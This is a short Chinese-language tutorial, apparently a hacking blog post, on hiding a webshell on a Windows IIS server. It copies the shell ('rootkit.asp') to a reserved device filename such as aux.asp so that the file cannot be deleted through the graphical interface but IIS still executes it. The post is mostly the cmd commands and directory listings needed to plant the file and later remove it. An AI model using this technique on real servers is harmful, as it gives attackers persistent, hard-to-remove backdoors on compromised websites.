利用系统保留文件名创建无法删除的webshell

Windows 下不能够以下面这些字样来命名文件/文件夹，包括：“aux”，“com1”“com2”“prn”“con”和“nul”等，但是通过cmd下是可以创 建此类文件夹的，使用copy命令即可实现：

D:/wwwroot>copy rootkit.asp //./D://wwwroot/aux.asp

已复制 1 个文件。

D:/wwwroot>dir

驱动器 D 中的卷没有标签。

卷的序列号是 4A56-1D29

D:/wwwroot 的目录

2010-04-25 14:41 <DIR> .

2010-04-25 14:41 <DIR> ..

2010-03-08 22:50 42,756 aux.asp

2005-05-02 03:02 9,083 index.asp

2010-03-08 22:50 42,756 rootkit.asp

3 个文件 94,595 字节

2 个目录 3,307,204,608 可用字节

这类文件无法在图形界面删除，如下图所示：

只 能在命令行下删除：

D:/wwwroot>del //./D:/wwwroot/aux.asp

D:/wwwroot>

然而在IIS中，这种文件又是可以解析成功的。